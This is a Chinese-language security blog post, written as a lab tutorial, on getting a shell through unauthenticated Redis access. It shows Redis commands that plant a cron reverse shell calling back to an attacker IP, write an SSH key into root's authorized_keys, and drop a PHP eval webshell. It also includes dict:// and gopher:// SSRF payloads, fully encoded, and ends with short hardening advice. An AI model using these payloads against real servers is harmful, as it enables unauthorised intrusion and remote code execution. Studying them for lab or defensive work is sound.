<!doctype html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#f7f7f4">
<meta name="color-scheme" content="light">

<title>Redis未授权 — CurlySean&#39;s Blog</title>
<meta name="description" content="这里是 CurlySean 的个人技术博客，记录漏洞研究、代码审计与攻防实践，整理可以复现、验证与继续推演的技术细节。">
<link rel="canonical" href="http://curlysean.github.io/2025/08/15/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/">
<link rel="stylesheet" href="/css/style.css">
<script>document.documentElement.classList.add('js')</script>

<meta name="generator" content="Hexo 7.3.0"></head>
<body class="page-type-post">
  <a class="skip-link" href="#main-content">跳至正文</a>
  
<header class="site-header" data-header>
  <div class="site-header__inner frame">
    <a class="brand" href="/" aria-label="CurlySean&#39;s Blog 首页">
      <span class="brand__name">CURLYSEAN</span>
      <span class="brand__suffix">SECURITY NOTES</span>
    </a>
    <nav class="desktop-nav" aria-label="主导航">
      
        <a class="desktop-nav__link" href="/">首页</a>
      
        <a class="desktop-nav__link" href="/archives/">文章</a>
      
        <a class="desktop-nav__link" href="/categories/">分类</a>
      
        <a class="desktop-nav__link" href="/tags/">标签</a>
      
        <a class="desktop-nav__link" href="/friends/">友链</a>
      
        <a class="desktop-nav__link" href="/about/">关于</a>
      
    </nav>
    <a class="header-cta" href="/archives/">开始阅读 <span aria-hidden="true">↗</span></a>
    <button class="menu-toggle" type="button" aria-expanded="false" aria-controls="mobile-menu" data-menu-toggle>
      <span class="sr-only">打开导航</span>
      <span></span><span></span>
    </button>
  </div>
  <nav class="mobile-nav" id="mobile-menu" aria-label="移动端主导航" data-mobile-menu>
    <div class="frame mobile-nav__inner">
      
        <a class="mobile-nav__link" href="/">
          <span>01</span>首页<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/archives/">
          <span>02</span>文章<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/categories/">
          <span>03</span>分类<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/tags/">
          <span>04</span>标签<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/friends/">
          <span>05</span>友链<i aria-hidden="true">↗</i>
        </a>
      
        <a class="mobile-nav__link" href="/about/">
          <span>06</span>关于<i aria-hidden="true">↗</i>
        </a>
      
    </div>
  </nav>
</header>

  <main id="main-content">
    
<article class="post-page">
  <header class="post-hero">
    <div class="frame post-hero__grid reveal">
      <div class="post-hero__label">
        <p class="eyebrow">FIELD NOTE / 2025</p>
        
          <a href="/categories/Web/">Web ↗</a>
        
      </div>
      <div class="post-hero__main">
        <h1>Redis未授权</h1>
        
      </div>
    </div>
    <div class="frame post-meta-grid reveal">
      <div><span>发布</span><time datetime="2025-08-15T08:59:19.000Z">2025.08.15</time></div>
      <div><span>更新</span><time datetime="2025-08-15T08:59:19.000Z">2025.08.15</time></div>
      <div><span>阅读</span><strong>14 MIN</strong></div>
      <div><span>标签</span><strong>1</strong></div>
    </div>
  </header>

  <div class="frame post-content-layout">
    <aside class="post-rail">
      <div class="post-rail__inner">
        <p class="eyebrow">ON THIS PAGE</p>
        
          <nav class="toc" aria-label="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#q5QcT"><span class="toc-text">Redis未授权</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#FhQdW"><span class="toc-text">漏洞前置基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#LEbcL"><span class="toc-text">漏洞原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#h8y8K"><span class="toc-text">漏洞条件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#K88Im"><span class="toc-text">Redis常用命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#VsEEu"><span class="toc-text">Redis配置文件参数</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Sl5tq"><span class="toc-text">Redis getshell</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#c04qS"><span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WJSKP"><span class="toc-text">GetShell方式</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#SlICC"><span class="toc-text">覆盖计划任务</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ccZXx"><span class="toc-text">写入SSH公钥免密登录</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#iT15b"><span class="toc-text">写入webshell远程连接服务器</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RAluL"><span class="toc-text">主从复制</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EW0F1"><span class="toc-text">SSRF+Redis未授权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Zfnuz"><span class="toc-text">gopher协议</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#LkjeS"><span class="toc-text">redis安全配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#nOk6J"><span class="toc-text">小结</span></a></li></ol></li></ol></nav>
        
      </div>
    </aside>
    <div class="article-column">
      <div class="article-body">
        <h1 id="q5QcT">Redis未授权</h1>
好早以前写的文章了

<p>在之前打比赛时，遇到一个redis未授权访问的题目，搜搜索索写进去文件了，但是最后没搞出来，好可惜了，所以学了学Redis</p>
<h2 id="FhQdW">漏洞前置基础</h2>
<h3 id="LEbcL">漏洞原理</h3>

<p>Redis在默认情况下，会绑定<strong>0.0.0.0:6379</strong>，如果没有添加防火墙规则等相关策略，则Redis会暴露在公网，如果在<strong>没有密码认证</strong>（一般为空）情况下，会导致任意用户可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据</p>
<p>攻击者可以利用Redis自身提供config命令，进行文件操作，攻击者可以将自己的ssh公钥写入目标服务的&#x2F;root&#x2F;.ssh文件夹中<strong>authotrized_keys</strong>文件中，<strong>后续可以用对应私钥直接使用ssh服务登录目标服务器</strong></p>
<h3 id="h8y8K">漏洞条件</h3>
1. redis绑定在 0.0.0.0:6379，且没有添加防火墙规则等相关策略，直接暴露在公网
2. 没有密码认证，或已经知道密码，有条件能够远程登录redis服务

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Redis <span class="number">2.</span>x，<span class="number">3.</span>x，<span class="number">4.</span>x，<span class="number">5.</span>x</span><br></pre></td></tr></table></figure>

<h3 id="K88Im">Redis常用命令</h3>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">redis-cli -h ip -p <span class="number">6379</span> -a passwd   # 外部连接,Redis 的连接除了通过指定 IP，也可以通过指定域名</span><br><span class="line">info 								  # 查看相关redis信息</span><br><span class="line">set xz <span class="string">&quot;Hacker&quot;</span>                     # 设置键xz的值为字符串Hacker</span><br><span class="line">get xz                              # 获取键xz的内容</span><br><span class="line">INCR score                          # 使用INCR命令将score的值增加<span class="number">1</span></span><br><span class="line">keys *                              # 列出当前数据库中所有的键</span><br><span class="line">config set <span class="keyword">protected</span>-mode no        # 关闭安全模式</span><br><span class="line">get anotherkey                      # 获取一个不存在的键的值</span><br><span class="line">config set dir /root/redis          # 设置保存目录</span><br><span class="line">config set dbfilename redis.rdb     # 设置保存文件名</span><br><span class="line">config get dir                      # 查看保存目录</span><br><span class="line">config get dbfilename               # 查看保存文件名</span><br><span class="line">save                                # 进行一次备份操作</span><br><span class="line">flushall                            # 删除所有数据</span><br><span class="line">del key                             # 删除键为key的数据</span><br><span class="line">slaveof ip port   					# 设置主从关系</span><br><span class="line">mset k1 v1 k2 v2 k3 v3   #批量设置键值对</span><br><span class="line">mget k1 k2 k3 		#批量获取键值对</span><br><span class="line">使用SET和GET命令，可以完成基本的赋值和取值操作；</span><br><span class="line">Redis是不区分命令的大小写的，set和SET是同一个意思；</span><br><span class="line">使用keys *可以列出当前数据库中的所有键；</span><br><span class="line">当尝试获取一个不存在的键的值时，Redis会返回空，即(nil)；</span><br><span class="line">如果键的值中有空格，需要使用双引号括起来，如<span class="string">&quot;Hello World&quot;</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="VsEEu">Redis配置文件参数</h3>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">port参数：</span><br><span class="line">    格式为port后面接端口号，如port <span class="number">6379</span>，表示Redis服务器将在<span class="number">6379</span>端口上进行监听来等待客户端的连接。</span><br><span class="line"></span><br><span class="line">bind参数：</span><br><span class="line">    格式为bind后面接IP地址，可以同时绑定在多个IP地址上，IP地址之间用空格分离，如bind <span class="number">192.168</span><span class="number">.47</span><span class="number">.173</span> <span class="number">10.0</span><span class="number">.0</span><span class="number">.1</span>，表允许<span class="number">192.168</span><span class="number">.47</span><span class="number">.173</span>和<span class="number">10.0</span><span class="number">.0</span><span class="number">.1</span>两个IP连接。如果设置为<span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>则表示任意ip都可连接，说白了就是白名单。</span><br><span class="line"></span><br><span class="line">save参数：</span><br><span class="line">    格式为save &lt;秒数&gt; &lt;变化数&gt;，表示在指定的秒数内数据库存在指定的改变数时自动进行备份（Redis是内存数据库，这里的备份就是指把内存中的数据备份到磁盘上）。可以同时指定多个save参数，如：</span><br><span class="line">        save <span class="number">900</span> <span class="number">1</span></span><br><span class="line">        save <span class="number">300</span> <span class="number">10</span></span><br><span class="line">        save <span class="number">60</span> <span class="number">10000</span></span><br><span class="line">    表示如果数据库的内容在<span class="number">60</span>秒后产生了<span class="number">10000</span>次改变，或者<span class="number">300</span>秒后产生了<span class="number">10</span>次改变，或者<span class="number">900</span>秒后产生了<span class="number">1</span>次改变，那么立即进行备份操作。</span><br><span class="line"></span><br><span class="line">requirepass参数：</span><br><span class="line">    格式为requirepass后接指定的密码，用于指定客户端在连接Redis服务器时所使用的密码。Redis默认的密码参数是空的，说明不需要密码即可连接；同时，配置文件有一条注释了的requirepass foobared命令，如果去掉注释，表示需要使用foobared密码才能连接Redis数据库。</span><br><span class="line"></span><br><span class="line">dir参数：</span><br><span class="line">    格式为dir后接指定的路径，默认为dir ./，指明Redis的工作目录为当前目录，即redis-server文件所在的目录。注意，Redis产生的备份文件将放在这个目录下。</span><br><span class="line"></span><br><span class="line">dbfilename参数：</span><br><span class="line">    格式为dbfilename后接指定的文件名称，用于指定Redis备份文件的名字，默认为dbfilename dump.rdb，即备份文件的名字为dump.rdb。</span><br><span class="line"></span><br><span class="line">config命令：</span><br><span class="line">    通过config命令可以读取和设置dir参数以及dbfilename参数，因为这条命令比较危险（实验将进行详细介绍），所以Redis在配置文件中提供了rename-command参数来对其进行重命名操作，如rename-command CONFIG HTCMD，可以将CONFIG命令重命名为HTCMD。配置文件默认是没有对CONFIG命令进行重命名操作的。</span><br><span class="line"></span><br><span class="line"><span class="keyword">protected</span>-mode参数：</span><br><span class="line">    redis3<span class="number">.2</span>之后添加了<span class="keyword">protected</span>-mode安全模式，默认值为yes，开启后禁止外部连接，所以在测试时，先在配置中修改为no。</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Sl5tq">Redis getshell</h2>
我们看看如果通过Redis未授权访问来达到getShell

<h3 id="c04qS">环境搭建</h3>

<p>这里我直接用docker命令<code>docker pull redis:5.0.12</code>，用docker来搭建了一个漏洞环境</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1736862757029-0be22a84-c8b8-4871-ba68-b822a77fa4eb.png"></p>
<p>用dockerDesktop直接启动，6379端口映射到6380端口</p>
<p>使用工具进行连接（我这里用的是RedisDesktopManager）</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/44744277/1736862836554-b3ea7777-fce0-42a7-bb01-9df11a1ae2cb.png"><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1736862887660-05075c68-8b89-48bc-ac8b-8a376b951889.png"></p>
<h3 id="WJSKP">GetShell方式</h3>

<p>这里我们讲解redis未授权访问拿shell的3种方式</p>
<ol>
<li>写入SSH 公钥 免密登录</li>
<li>向web中写入webshell</li>
<li>覆盖计划任务反弹shell</li>
</ol>
<h4 id="SlICC">覆盖计划任务</h4>
首先我们的攻击机监听2333端口

<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1736862929649-be936bb6-22fc-4857-9b69-1fd82dc04b03.png"></p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#然后在redis的控制台中设置一个key为反弹shell的语句</span></span><br><span class="line"><span class="comment">#其中5个 * 号代表每分钟执行一次，后面为反弹shell的语句，换行是为了避免crontab的语法错误</span></span><br><span class="line"><span class="attribute">set</span> xxx <span class="string">&quot;\n\n* * * * * bash -i&gt;&amp; /dev/tcp/192.168.253.128/2333 0&gt;&amp;1\n\n&quot;</span></span><br><span class="line"><span class="comment">#然后修改路径为/var/spool/cron/</span></span><br><span class="line">config set dir /var/spool/cron/</span><br><span class="line"><span class="comment">#设置文件名为root</span></span><br><span class="line">config set dbfilename root</span><br><span class="line"><span class="comment">#最后save保存进去</span></span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<p>我们可以看到，这里已经成功写入了root计划任务，等着时间到计划任务即可（由于我这里搭建redis的系统功能不全，没有成功反弹）</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1736863710877-95deee2b-283c-4fe5-931e-fb118d7ceaf1.png"></p>
<p>这里我们看一下保存下来的文件长什么样子，就知道\n的作用是什么了</p>
<p>前面会有版本等垃圾信息，为了保证我们的crontab语法不被破坏，所以需要用回车键来避免</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#cat root</span></span><br><span class="line"><span class="attribute">REDIS0009</span>       redis-ver5.<span class="number">0</span>.<span class="number">12</span></span><br><span class="line">redis-bits<span class="variable">@ctime</span>¡oused-mem8</span><br><span class="line">aof-preamblexxx&gt;\n\n* * * * * bash -i&gt;&amp; /dev/tcp/<span class="number">192.168.253.128</span>/<span class="number">2333</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span>\n\ndسC</span><br></pre></td></tr></table></figure>

<h4 id="ccZXx">写入SSH公钥免密登录</h4>
首先我们需要在攻击机上生成ssh公钥和私钥，密码设置为空

<p><code>**ssh-keygen -t rsa**</code></p>
<p>将公钥写入key.txt当中（文件名无限制）</p>
<p><code>**(echo -e &quot;\n\n&quot;; cat id_rsa.pub; echo -e &quot;\n\n&quot;) &gt; key.txt**</code></p>
<p>导入内容（防止乱码）</p>
<p><code>**cat key.txt| redis-cli -h 192.168.253.135 -x set putsshkey**</code></p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#设置路径</span></span><br><span class="line"><span class="attribute">config</span> set dir /root/.ssh</span><br><span class="line"><span class="comment">#设置文件名</span></span><br><span class="line">config set dbfilename authorized_keys</span><br><span class="line"><span class="comment">#保存key值到root文件中</span></span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<p>然后<code>ssh -i id_rsa root@192.168.253.135</code>远程登录目标系统</p>
<h4 id="iT15b">写入webshell远程连接服务器</h4>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#设置木马</span></span><br><span class="line"><span class="attribute">set</span> xxx <span class="string">&quot;\n\n&lt;?php eval(<span class="variable">$_GET</span>[&#x27;x&#x27;]);?&gt;\n\n&quot;</span></span><br><span class="line"><span class="comment">#然后修改路径为网站默认路径</span></span><br><span class="line">config set dir /var/www/html</span><br><span class="line"><span class="comment">#设置文件名</span></span><br><span class="line">config set dbfilename shell.php</span><br><span class="line"><span class="comment">#最后save保存进去</span></span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<p><strong>利用条件：</strong></p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">知道网站根目录绝对路径（实际渗透过程中，这个方法通常需要搭配 phpinfo() 等方法使用。）</span><br><span class="line">无需是 <span class="attribute">root</span> 起的 Redis</span><br><span class="line">可适用于 Windows（非 ssh 连接）</span><br><span class="line">一般无需 flushall 清空数据库（一定情况下也需要）</span><br></pre></td></tr></table></figure>

<h3 id="RAluL">主从复制</h3>
在某些情况下，可以使用redis主从复制来进行写入文件的操作

<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#在从机上设置主机</span></span><br><span class="line">127.0.0.1:6380&gt; <span class="attribute">slaveof</span> <span class="number">127.0.0.1</span> <span class="number">6381</span></span><br><span class="line">OK</span><br><span class="line"><span class="comment">#在主机上设置键值对</span></span><br><span class="line"><span class="number">127.0.0.1:6381</span>&gt; set sean sheep</span><br><span class="line">OK</span><br><span class="line"><span class="comment">#在从机上获取键值对</span></span><br><span class="line"><span class="number">127.0.0.1:6380</span>&gt; get sean</span><br><span class="line"><span class="string">&quot;sheep&quot;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#先设置好保存的路径和保存的文件名</span></span><br><span class="line">dict://192.168.33.134:6379/slaveof:192.168.33.131:6379 </span><br><span class="line">dict://192.168.33.134:6379/config:set:dir:/www/admin/localhost_80/<span class="attribute">wwwroot</span></span><br><span class="line">dict://192.168.33.134:6379/config:set:dbfilename:ssrf.php</span><br><span class="line"><span class="comment">#然后进入主机进行主从复制操作，方法和上面的一样</span></span><br><span class="line"><span class="number">127.0.0.1:6379</span>&gt; set xxx <span class="string">&quot;\n\n\n&lt;?php phpinfo() ;?&gt;\n\n\n&quot;</span></span><br><span class="line"><span class="comment">#再去web端执行save操作</span></span><br><span class="line">dict://192.168.33.134:6379/save</span><br><span class="line"><span class="comment">#这样数据直接回同步到目标机，从而写入文件</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="EW0F1">SSRF+Redis未授权</h2>
<h3 id="Zfnuz">gopher协议</h3>
gopher协议和dict协议一样需要使用redis内置的命令进行文件写入，只是payload更加复杂

<p>我这里就用写入webshell来演示</p>
<p>下面这些是我们需要执行的命令</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">flushall</span></span><br><span class="line">set <span class="number">1</span> <span class="string">&#x27;&lt;?php phpinfo();?&gt;&#x27;</span></span><br><span class="line">config set dir /tmp</span><br><span class="line">config set dbfilename shell.php</span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<p>这里我使用的是 <a target="_blank" rel="noopener" href="https://github.com/firebroo/sec_tools">https://github.com/firebroo/sec_tools</a> 工具</p>
<p>将上述执行的命令写入<code>redis.cmd</code>中</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1736913439020-371bb3d8-02b2-47a5-928a-e5ea3a7ca15e.png"></p>
<p>保存好后执行<code>python2 redis-over-gopher.py</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1736913485254-29f48e20-c783-4265-86aa-778a568ed1f1.png"></p>
<p>生成payload后，若在在bp中还需要将payload再进行一次url编码</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%0d%0a%31%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%34%0d%0a%2f%74%6d%70%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%30%0d%0<span class="attribute">a</span></span><br><span class="line"></span><br><span class="line">gopher://127.0.0.1:6379/_%252a%2531%250d%250a%2524%2538%250d%250a%2566%256c%2575%2573%2568%2561%256c%256c%250d%250a%252a%2533%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2531%250d%250a%2531%250d%250a%2524%2531%2538%250d%250a%253c%253f%2570%2568%2570%2520%2570%2568%2570%2569%256e%2566%256f%2528%2529%253b%253f%253e%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2533%250d%250a%2564%2569%2572%250d%250a%2524%2534%250d%250a%252f%2574%256d%2570%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2531%2530%250d%250a%2564%2562%2566%2569%256c%2565%256e%2561%256d%2565%250d%250a%2524%2539%250d%250a%2573%2568%2565%256c%256c%252e%2570%2568%2570%250d%250a%252a%2530%250d%250a</span><br></pre></td></tr></table></figure>



<h2 id="LkjeS">redis安全配置</h2>

<ol>
<li>以普通账号启动redis服务</li>
<li>监听本地或特定主机</li>
<li>开启 protected-mode</li>
<li>更改默认6379端口</li>
<li>为redis设置密码（最好是强密码）</li>
</ol>
<h2 id="nOk6J">小结</h2>
还是挺有意思的一种漏洞，能够配合SSRF攻击内网的Redis未授权访问达到写入文件的目的，最后可以getShell拿到服务器权限




      </div>
      
        <div class="post-tags" aria-label="文章标签">
          
            <a href="/tags/Redis/"># Redis</a>
          
        </div>
      
    </div>
  </div>

  <nav class="frame post-navigation" aria-label="相邻文章">
    
      <a href="/2025/08/19/JDK7u21/">
        <span>← PREVIOUS</span>
        <strong>JDK7u21</strong>
      </a>
    
    
      <a href="/2025/08/15/H2-JDBC-Attack/">
        <span>NEXT →</span>
        <strong>H2-JDBC-Attack</strong>
      </a>
    
  </nav>
</article>

  </main>
  <footer class="site-footer">
  <div class="frame site-footer__inner">
    <div class="site-footer__identity">
      <a href="/">CURLYSEAN</a>
      <span>持续记录，保持验证。</span>
    </div>
    <p class="site-footer__copyright">© 2026 CurlySean</p>
    <nav class="site-footer__links" aria-label="外部链接">
      <a href="https://github.com/CurlySean" target="_blank" rel="noopener">GitHub ↗</a>
      <a href="mailto:5345414e@gmail.com">Email ↗</a>
    </nav>
  </div>
</footer>
<button class="back-to-top" type="button" aria-label="返回顶部" data-back-to-top>↑</button>
<script src="/js/main.js" defer></script>

</body>
</html>
